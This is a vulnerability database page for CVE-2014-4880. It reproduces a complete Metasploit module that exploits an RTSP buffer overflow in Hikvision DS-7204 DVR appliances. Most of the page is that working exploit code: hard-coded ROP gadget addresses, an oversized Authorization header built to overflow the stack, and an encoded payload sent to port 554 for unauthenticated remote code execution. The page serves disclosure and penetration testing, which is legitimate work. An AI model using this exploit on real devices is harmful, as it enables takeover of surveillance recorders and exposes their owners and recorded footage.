Hikvision DVR RTSP Request Remote Code Execution

2014-11-21 / 2014-11-24
Credit: Mark Schloesser
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-4880
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Hikvision DVR RTSP Request Remote Code Execution', 'Description' => %q{ This module exploits a buffer overflow in the RTSP request parsing code of Hikvision DVR appliances. The Hikvision DVR devices record video feeds of surveillance cameras and offer remote administration and playback of recorded footage. The vulnerability is present in several models / firmware versions but due to the available test device this module only supports the DS-7204 model. }, 'Author' => [ 'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-4880' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ] ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Privileged' => true, 'Targets' => [ # # ROP targets are difficult to represent in the hash, use callbacks instead # [ "DS-7204 Firmware V2.2.10 build 131009", { # The callback handles all target-specific settings :callback => :target_ds7204_1, 'g_adjustesp' => 0x002c828c, # ADD SP, SP, #0x350 # LDMFD SP!, {R4-R6,PC} 'g_r3fromsp' => 0x00446f80, # ADD R3, SP, #0x60+var_58 # BLX R6 'g_blxr3_pop' => 0x00456360, # BLX R3 # LDMFD SP!, {R1-R7,PC} 'g_popr3' => 0x0000fe98, # LDMFD SP!, {R3,PC} } ], [ "Debug Target", { # The callback handles all target-specific settings :callback => :target_debug } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2014')) register_options( [ Opt::RPORT(554) ], self.class) end def exploit unless self.respond_to?(target[:callback]) fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined") end device_rop = self.send(target[:callback]) request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n" request << "CSeq: 7\r\n" request << "Authorization: Basic " request << rand_text_alpha(0x280 + 34) request << [target["g_adjustesp"]].pack("V")[0..2] request << "\r\n\r\n" request << rand_text_alpha(19) # now append the ropchain request << device_rop request << rand_text_alpha(8) request << payload.encoded connect sock.put(request) disconnect end # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc def target_ds7204_1 # Create a fixed-size buffer for the rop chain ropbuf = rand_text_alpha(24) # CHAIN = [ # 0, #R4 pop adjustsp # 0, #R5 pop adjustsp # GADGET_BLXR3_POP, #R6 pop adjustsp # GADGET_POPR3, # 0, #R3 pop # GADGET_R3FROMSP, # ] ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V") ropbuf[12,4] = [target["g_popr3"]].pack("V") ropbuf[20,4] = [target["g_r3fromsp"]].pack("V") return ropbuf end # Generate a buffer that provides a starting point for exploit development def target_debug Rex::Text.pattern_create(2000) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end end

References:

https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top